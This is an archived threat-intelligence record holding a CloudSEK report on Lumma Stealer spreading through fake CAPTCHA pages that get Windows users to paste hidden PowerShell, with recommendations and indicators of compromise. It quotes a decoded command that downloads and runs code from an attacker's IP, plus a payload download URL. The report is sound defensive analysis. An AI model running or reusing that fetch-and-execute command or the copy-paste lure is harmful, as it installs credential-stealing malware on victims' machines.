{
	"id": "56e229d5-bdb0-48eb-b910-ec216c70d3a2",
	"created_at": "2026-04-06T00:18:24.410283Z",
	"updated_at": "2026-04-10T03:23:51.095012Z",
	"deleted_at": null,
	"sha1_hash": "8d36abaeb0cedddfb780c7bc16954a0a78b33f1e",
	"title": "Unmasking the Danger: Lumma Stealer Malware Exploits Fake CAPTCHA Pages",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 975911,
	"plain_text": "Unmasking the Danger: Lumma Stealer Malware Exploits Fake\r\nCAPTCHA Pages\r\nBy CloudSEK TRIAD\r\nPublished: 2025-08-21 · Archived: 2026-04-05 21:58:07 UTC\r\nBack\r\nMalware Intelligence\r\nThe Lumma Stealer malware is being distributed through deceptive human verification pages that trick users into\r\nrunning malicious PowerShell commands. This phishing campaign primarily targets Windows users and can lead\r\nto the theft of sensitive information\r\nSeptember 19, 2024\r\n5\r\nmin\r\nhttps://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages\r\nPage 1 of 8\n\nSubscribe to CloudSEK Resources\r\nGet the latest industry news, threats and resources.\r\nCategory: Adversary Intelligence\r\nIndustry: Multiple\r\nMotivation: Cyber Crime/Financial\r\nRegion: Global\r\nTLP: GEEEN\r\nExecutive Summary\r\nA new and sophisticated method of distributing Lumma Stealer malware has been uncovered, targeting Windows\r\nusers through deceptive human verification pages. This technique, initially discovered by Unit42 at Palo Alto\r\nNetworks, has prompted further investigation into similar malicious sites.\r\nAfter our investigation, we have identified more active malicious sites spreading the Lumma Stealer. It's important\r\nto note that while this technique is currently being used to distribute Lumma Stealer, it could potentially be\r\nleveraged to deliver any type of malicious malware to unsuspecting users. \r\nhttps://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages\r\nPage 2 of 8\n\nFlow of the Phishing Campaign and Malware Infection\r\nAnalysis and Attribution\r\nModus Operandi\r\nThreat actors create phishing sites hosted on various providers, often utilizing Content Delivery Networks\r\n(CDNs). These sites present users with a fake Google CAPTCHA page.\r\nUpon clicking the \"Verify\" button, users are presented with unusual instructions:some text\r\nOpen the Run dialog (Win+R)\r\nPress Ctrl+V\r\nHit Enter\r\nUnbeknownst to the user, this action executes a hidden JavaScript function that copies a base64-encoded\r\nPowerShell command to the clipboard.\r\nThe PowerShell command, when executed, downloads the Lumma Stealer malware from a remote server.\r\nTechnical Analysis\r\nOur research team identified multiple domains hosting these malicious verification pages. The infection chain\r\ntypically follows this pattern:\r\nUser visits the fake verification page\r\nhttps://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages\r\nPage 3 of 8\n\nPhishing Page Prompting deceptive Google Captcha Verification prompt\r\nPowerShell script is copied on the clipboard via the Clicking on the “I’m not a robot” button. Once\r\ninspecting the source code of the phishing sites can also reveal the command which is being copied.\r\nVerifications steps asked by the deceptive sites\r\nhttps://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages\r\nPage 4 of 8\n\nOnce the user pastes the PowerShell command into the Run dialog box, it will run PowerShell in a hidden\r\nwindow and execute the Base64-encoded command: powershell -w hidden -eC\r\nThe decoded Base64 command, iex (iwr http://165.227.121.41/a.txt -UseBasicParsing).Content, will fetch\r\nthe content from the a.txt file hosted on the remote server. This content will then be parsed and executed\r\nusing Invoke-Expression.\r\nThe a.txt file contains additional commands to download the Lumma Stealer onto the victim's device,\r\nhosted at: https://downcheck.nyc3[.]cdn[.]digitaloceanspaces.com/dengo.zip \r\nFurther commands on a.txt to download the malicious file\r\nIf the downloaded file(dengo.zip) is extracted and executed on a Windows machine, the Lumma Stealer\r\nwill become operational and establish connections with attacker-controlled domains.\r\nNotable Observations\r\nMalicious pages were found on various platforms, including Amazon S3 buckets and CDN providers\r\nThe use of base64 encoding and clipboard manipulation demonstrates the attackers' efforts to evade\r\ndetection\r\nThe initial executable often downloads additional components, complicating analysis and potentially\r\nallowing for modular functionality\r\nhttps://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages\r\nPage 5 of 8\n\nAlthough this campaign primarily targets distributing Lumma Stealer malware, it has the potential to\r\ndeceive users into downloading various types of malicious files onto their Windows devices.\r\nRecommendations\r\nEducate Employees/Users about this new social engineering tactic, emphasizing the danger of copying and\r\npasting unknown commands.\r\nImplement and maintain robust endpoint protection solutions capable of detecting and blocking\r\nPowerShell-based attacks.\r\nMonitor network traffic for suspicious connections to newly registered or uncommon domains.\r\nRegularly update and patch all systems to mitigate potential vulnerabilities exploited by the Lumma Stealer\r\nmalware.\r\nMalicious Fake URLs\r\nhxxps[://]heroic-genie-2b372e[.]netlify[.]app/please-verify-z[.]html\r\nhxxps[://]fipydslaongos[.]b-cdn[.]net/please-verify-z[.]html\r\nhxxps[://]sdkjhfdskjnck[.]s3[.]amazonaws[.]com/human-verify-system[.]html\r\nhxxps[://]verifyhuman476[.]b-cdn[.]net/human-verify-system[.]html\r\nhxxps[://]pub-9c4ec7f3f95c448b85e464d2b533aac1[.]r2[.]dev/human-verify-system[.]html\r\nhxxps[://]verifyhuman476[.]b-cdn[.]net/human-verify-system[.]html\r\nhxxps[://]newvideozones[.]click/veri[.]html\r\nhxxps[://]ch3[.]dlvideosfre[.]click/human-verify-system[.]html\r\nhxxps[://]newvideozones[.]click/veri[.]html\r\nhxxps[://]ofsetvideofre[.]click\r\nType | Name | Value\r\nFile | dengo.zip | 7c348f51d383d6587e2beac5ff79bef2e66c31d7\r\nIP | Downloader Server IP | 165.227.121.41\r\nPE Exec File | tr7 | e002696bb7d57315b352844cebc031e18e89f29e\r\nPE Exec File | 2ndhsoru |766c266506918b467bf35db701c9b0954a616b58\r\nReferences\r\n*Intelligence source and information reliability - Wikipedia\r\nhttps://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages\r\nPage 6 of 8\n\n#Traffic Light Protocol - Wikipedia\r\nhttps://darktrace.com/blog/the-rise-of-the-lumma-info-stealer \r\nUnit42-timely-threat-intel/2024-08-28-IOCs-for-Lumman-Stealer-from-fake-human-captcha-copy-paste-script.txt at main  \r\nAppendix\r\nLumma Stealer Malware-as-a-Service Page\r\nhttps://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages\r\nPage 7 of 8\n\nCloudSEK TRIAD\r\nCloudSEK Threat Research and Information Analytics Division\r\nNo items found.\r\nSubscribe to CloudSEK Resources\r\nGet the latest industry news, threats and resources.\r\nSource: https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages\r\nhttps://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages"
	],
	"report_names": [
		"unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434704,
	"ts_updated_at": 1775791431,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8d36abaeb0cedddfb780c7bc16954a0a78b33f1e.pdf",
		"text": "https://archive.orkl.eu/8d36abaeb0cedddfb780c7bc16954a0a78b33f1e.txt",
		"img": "https://archive.orkl.eu/8d36abaeb0cedddfb780c7bc16954a0a78b33f1e.jpg"
	}
}